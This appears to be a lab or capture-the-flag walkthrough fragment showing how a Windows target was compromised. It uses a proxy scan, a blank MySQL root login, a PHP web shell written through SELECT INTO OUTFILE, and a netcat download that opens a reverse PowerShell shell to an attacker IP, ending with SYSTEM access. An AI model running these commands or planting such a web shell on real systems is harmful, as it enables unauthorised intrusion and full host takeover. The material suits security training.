Foothold
❯ git clone https://github.com/aancw/spose.git
Cloning into 'spose'...
remote: Enumerating objects: 11, done.
remote: Total 11 (delta 0), reused 0 (delta 0), pack-reused 11 (from 1)
Receiving objects: 100% (11/11), done.
Last updated
❯ git clone https://github.com/aancw/spose.git
Cloning into 'spose'...
remote: Enumerating objects: 11, done.
remote: Total 11 (delta 0), reused 0 (delta 0), pack-reused 11 (from 1)
Receiving objects: 100% (11/11), done.
Last updated
❯ python spose.py --proxy http://192.168.186.189:3128 --target 192.168.186.189
Using proxy address http://192.168.186.189:3128
192.168.186.189 3306 seems OPEN
192.168.186.189 8080 seems OPENhttp://192.168.186.189:8080/root:[blank]SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\wamp\\www\\cmd.php" ❯ nc -lnvp 1337❯ curl --proxy http://192.168.186.189:3128 http://192.168.186.189:8080/cmd.php\?cmd\=curl+192.168.45.239/nc.exe+-o+C:\\programdata\\nc.exe❯ curl --proxy http://192.168.186.189:3128 http://192.168.186.189:8080/cmd.php\?cmd\=C:\\programdata\\nc.exe+192.168.45.239+1337+-e+powershell.exe❯ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.186.189] 49772
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\wamp\www> whoami ; type C:\Users\Administrator\Desktop\proof.txt ; ipconfig
whoami ; type C:\Users\Administrator\Desktop\proof.txt ; ipconfig
nt authority\system
8e91c7eab222631a3c6df21fac3611c1
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.186.189
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.186.254